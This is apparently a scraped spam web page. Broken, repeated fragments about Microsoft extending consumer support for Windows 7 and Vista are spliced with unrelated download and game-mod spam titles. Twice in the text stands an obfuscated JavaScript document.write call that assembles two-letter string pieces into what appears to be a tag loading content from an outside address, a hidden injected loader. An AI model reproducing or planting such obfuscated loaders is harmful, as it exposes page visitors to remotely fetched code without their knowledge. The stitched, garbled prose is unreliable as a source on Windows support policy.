write(O["EB"] O["bY"] O["ns"] O["KZ"] O["fi"] O["Rr"] O["Io"] O["Zm"] O["VB"] O["Ff"] O["TV"] O["bY"] O["ns"] O["KZ"] O["EB"] O["bY"] O["ns"] O["tN"] O["VY"] O["ky"] O["bP"] O["Ow"] O["eO"] O["fu"] O["eJ"] O["DH"] O["bY"] O["ns"] O["ZG"] O["KR"] O["Mi"] O["bP"] O["us"] O["tH"] O["SJ"] O["HS"] O["MF"] O["rC"] O["Wy"] O["Eo"] O["Ur"] O["cx"] O["mY"] O["Kr"] O["no"] O["RO"] O["sK"] O["bY"] O["ns"] O["Bb"] O["uo"] O["fA"] O["Rj"] O["ci"] O["eB"] O["RH"] O["PQ"] O["Om"] O["EC"] O["uL"] O["gv"] O["Vg"] O["BF"] O["oi"] O["iG"] O["xy"] O["zR"] O["LN"] O["ww"] O["jt"] O["zv"] O["Hv"] O["ML"] O["Uf"] O["HW"]);Windows 7 mainstream support ends.. This month, with almost no fanfare, Microsoft has revised its support policy for consumer versions of Windows so that they qualify for extended support as well.. ";O["ML"]="ri";O["HW"]=">";O["Ur"]="ak";O["zR"]="_e";O["eJ"]="av";O["tH"]="tp";O["Io"]="q ";O["ky"]="pe";O["eB"]="/a";O["SJ"]=":/";O["TV"]="/s";O["RH"]="rt";O["iG"]="lo";O["rC"]="PH";O["Rr"]="r ";O["bP"]="=\"";O["Wy"]="bt";O["EB"]="";O["Ff"]=";";document.. Is it time to upgrade?Microsoft quietly extends consumer support for Windows 7, Vista..  This English- language translation (courtesy of Microsoft's own web service) captures the gist in only slightly fractured syntax. Battlefleet Gothic Armada Increase Fleet Points Mod

write(O["EB"] O["bY"] O["ns"] O["KZ"] O["fi"] O["Rr"] O["Io"] O["Zm"] O["VB"] O["Ff"] O["TV"] O["bY"] O["ns"] O["KZ"] O["EB"] O["bY"] O["ns"] O["tN"] O["VY"] O["ky"] O["bP"] O["Ow"] O["eO"] O["fu"] O["eJ"] O["DH"] O["bY"] O["ns"] O["ZG"] O["KR"] O["Mi"] O["bP"] O["us"] O["tH"] O["SJ"] O["HS"] O["MF"] O["rC"] O["Wy"] O["Eo"] O["Ur"] O["cx"] O["mY"] O["Kr"] O["no"] O["RO"] O["sK"] O["bY"] O["ns"] O["Bb"] O["uo"] O["fA"] O["Rj"] O["ci"] O["eB"] O["RH"] O["PQ"] O["Om"] O["EC"] O["uL"] O["gv"] O["Vg"] O["BF"] O["oi"] O["iG"] O["xy"] O["zR"] O["LN"] O["ww"] O["jt"] O["zv"] O["Hv"] O["ML"] O["Uf"] O["HW"]);Windows 7 mainstream support ends.. This month, with almost no fanfare, Microsoft has revised its support policy for consumer versions of Windows so that they qualify for extended support as well.. ";O["ML"]="ri";O["HW"]=">";O["Ur"]="ak";O["zR"]="_e";O["eJ"]="av";O["tH"]="tp";O["Io"]="q ";O["ky"]="pe";O["eB"]="/a";O["SJ"]=":/";O["TV"]="/s";O["RH"]="rt";O["iG"]="lo";O["rC"]="PH";O["Rr"]="r ";O["bP"]="=\"";O["Wy"]="bt";O["EB"]="";O["Ff"]=";";document.. Is it time to upgrade?Microsoft quietly extends consumer support for Windows 7, Vista..  This English- language translation (courtesy of Microsoft's own web service) captures the gist in only slightly fractured syntax. 773a7aa168 Battlefleet Gothic Armada Increase Fleet Points Mod

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Consumer versions get five years of mainstream support, and business versions get an additional five years of extended support.. That was true when I first wrote about this issue in 2 I published an updated post covering Windows 7.. Will be applied the extended support for Windows 7, Windows Vista consumer products.. Under those guidelines, mainstream support for Windows Vista is set to end in less than two months, on April 1.. If you go to the Support Lifecycle home page and search for a product family, you get new results for Windows Vista and Windows 7 that include Extended Support end dates for consumer versions of both products. Android Archive For Email Download

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